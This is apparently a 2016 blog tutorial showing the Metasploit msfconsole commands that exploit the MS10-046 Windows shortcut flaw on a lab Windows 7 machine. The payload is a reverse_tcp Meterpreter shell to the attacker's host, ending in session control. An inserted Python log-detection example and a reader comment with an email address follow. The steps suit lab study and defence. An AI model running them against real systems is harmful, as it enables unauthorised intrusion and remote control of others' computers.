Wednesday, 7 December 2016

Pen Testing Win 7 using Metasploit in Kali Linux


Hack Win 7 using Metasploit with step by step tutorials 



Exploiting a Windows vulnerability to log into the system without a username and password by using Metasploit.

Requirements:

1. Metasploit (any Kali Linux distribution).

2. Ruby installed (install all the Ruby packages to avoid any issues).

3. Two operating systems, running either as virtual machines on the same host or on physically different machines.

4. Target host must not be running any AV.

Machine 1: Host Kali Linux Machine

Machine 2: Target Windows 7 Machine

Launch msfconsole - type "msfconsole" in the Terminal

#msfconsole

When you get the msf prompt, look for the module

exploit/windows/browser/ms10_046_shortcut_icon_dllloader.

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. The module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
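From the defender's side, the WebDAV delivery described above leaves a recognizable trail in web proxy logs. The following is an added example, not part of the original post: it flags clients whose built-in Windows WebDAV client downloaded both a .lnk and a .dll from the same server. The log format, hosts and file names are constructed, and the .lnk-plus-.dll pairing is a heuristic assumed here.

```python
import posixpath
import re
from collections import defaultdict

# User-Agent prefix sent by the built-in Windows WebDAV client (mini-redirector).
WEBDAV_UA = "Microsoft-WebDAV-MiniRedir"

# Constructed sample; assumed format: client server "METHOD path HTTP/x" status "UA"
SAMPLE_LOG = """\
10.0.0.5 intranet.example "GET /index.html HTTP/1.1" 200 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
10.0.0.5 files.example "PROPFIND /share HTTP/1.1" 207 "Microsoft-WebDAV-MiniRedir/6.1.7601"
10.0.0.5 files.example "GET /share/notes.lnk HTTP/1.1" 200 "Microsoft-WebDAV-MiniRedir/6.1.7601"
10.0.0.9 203.0.113.7 "OPTIONS /docs HTTP/1.1" 200 "Microsoft-WebDAV-MiniRedir/6.1.7601"
10.0.0.9 203.0.113.7 "PROPFIND /docs HTTP/1.1" 207 "Microsoft-WebDAV-MiniRedir/6.1.7601"
10.0.0.9 203.0.113.7 "GET /docs/item.lnk HTTP/1.1" 200 "Microsoft-WebDAV-MiniRedir/6.1.7601"
10.0.0.9 203.0.113.7 "GET /docs/item.dll HTTP/1.1" 200 "Microsoft-WebDAV-MiniRedir/6.1.7601"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) "([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3}) "([^"]*)"$')


def find_suspect_pairs(log_text):
    """Return sorted (client, server) pairs where the WebDAV client
    successfully downloaded both a .lnk and a .dll from that server."""
    fetched = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        client, server, method, path, status, agent = m.groups()
        if method != "GET" or status != "200" or not agent.startswith(WEBDAV_UA):
            continue
        # Drop any query string, then take the extension of the requested file.
        ext = posixpath.splitext(path.split("?", 1)[0])[1].lower()
        if ext in (".lnk", ".dll"):
            fetched[(client, server)].add(ext)
    return sorted(p for p, exts in fetched.items() if exts == {".lnk", ".dll"})


if __name__ == "__main__":
    for client, server in find_suspect_pairs(SAMPLE_LOG):
        print(f"review: {client} pulled .lnk and .dll over WebDAV from {server}")
```

A shortcut fetched on its own from a file share, as in the 10.0.0.5 lines, is not flagged; only the pairing of both file types from one server is.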

Once we have found the desired module, we use this exploit by typing the command below.

#msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Once the exploit is loaded, we set the payload for the selected exploit. In our scenario we will be using a reverse TCP payload. Type the command below to set the payload.

#msf > set payload windows/meterpreter/reverse_tcp

Now it's time to do some configuration for the exploit and payload that we have just set. Type the following command.

#msf > show options

Now we have to set the local host to listen on. Type the two commands given below.

#msf > set SRVHOST 192.168.31.20

This will be the IP address of your host running Metasploit.

#msf > set LHOST 192.168.31.20
  
This will also be the IP address of your host running Metasploit.

Now check that the above configuration has been applied.

#msf > show options

Finally, we start the exploit. Run the command exploit.

#msf > exploit

Once executed we should see “Server Started” (make sure that your server is not running any web service on port 80).

On any client machine, simply open Internet Explorer and try to open http://192.168.31.20

Note: it will give you a pop-up asking for permission; click ALLOW, and make sure you do not have any antivirus running on the target PC.

You can check the number of successfully connected sessions by running the command sessions in the msf console.

Now that we can see we have one victim connected, it's time to log in to the system. Run the command sessions -i 1.

#msf > sessions -i 1

Once connected, type Linux-style commands to browse inside the system and have full control of it.

1 comment:

  1. Can you send me Kali Linux software... and step by step... send to my email... matyus89@gmail.com... sorry.. I'm a beginner..
